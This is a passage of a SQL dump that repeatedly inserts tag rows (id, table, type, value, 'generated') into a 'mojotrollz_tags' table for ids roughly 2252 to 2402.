(`id`, `table`, `type`, `value`, `comment`) VALUES (2252, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2252, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2253, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2253, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2254, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2254, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2255, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2255, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2256, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2256, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2257, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2257, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2258, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2258, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2260, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2260, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2261, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2261, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2263, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2263, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2264, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2264, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2265, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2265, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2266, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2266, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2267, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2267, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2268, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2268, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2269, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2269, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2270, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2270, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2271, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2271, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2272, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2272, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2274, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2274, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2275, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2276, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2276, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2277, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2277, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2278, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2278, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2283, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2283, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2284, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2284, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2285, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2285, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2287, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2287, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2299, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2299, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2302, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2302, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2303, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2303, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2304, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2304, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2305, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2305, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2306, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2306, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2307, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2307, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2308, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2308, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2309, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2309, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2310, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2310, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2311, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2311, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2314, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2314, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2315, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2315, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2316, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2316, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2317, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2317, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2318, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2318, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2319, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2319, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2320, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2320, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2321, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2321, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2322, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2322, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2323, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2323, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2324, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2324, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2326, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2326, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2327, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2327, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2329, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2329, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2330, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2330, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2331, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2331, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2332, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2332, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2333, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2333, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2334, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2334, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2335, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2335, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2336, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2336, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2337, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2337, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2338, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2338, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2339, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2339, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2344, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2344, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2345, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2345, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2346, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2346, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2347, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2347, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2348, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2348, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2349, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2349, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2350, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2350, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2351, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2351, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2352, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2352, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2354, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2354, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2356, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2356, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2357, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2357, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2358, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2358, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2359, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2359, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2360, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2360, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2361, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2361, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2362, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2362, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2363, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2363, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2364, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2364, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2365, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2365, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2366, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2366, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2367, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2367, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2368, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2368, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2369, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2369, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2370, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2370, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2371, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2371, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2372, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2372, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2373, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2373, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2374, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2374, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2375, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2375, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2376, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2376, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2377, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2377, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2378, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2378, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2379, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2379, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2380, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2380, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2381, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2381, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2382, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2382, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2383, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2383, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2384, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2384, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2385, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2385, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2386, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2386, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2387, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2387, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2388, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2388, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2389, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2389, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2390, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2390, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2391, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2391, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2392, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2392, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2393, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2393, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2394, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2394, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2395, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2395, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2396, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2396, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2397, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2397, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2398, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2398, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2399, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2399, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2400, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2400, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2401, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2401, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2402, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, 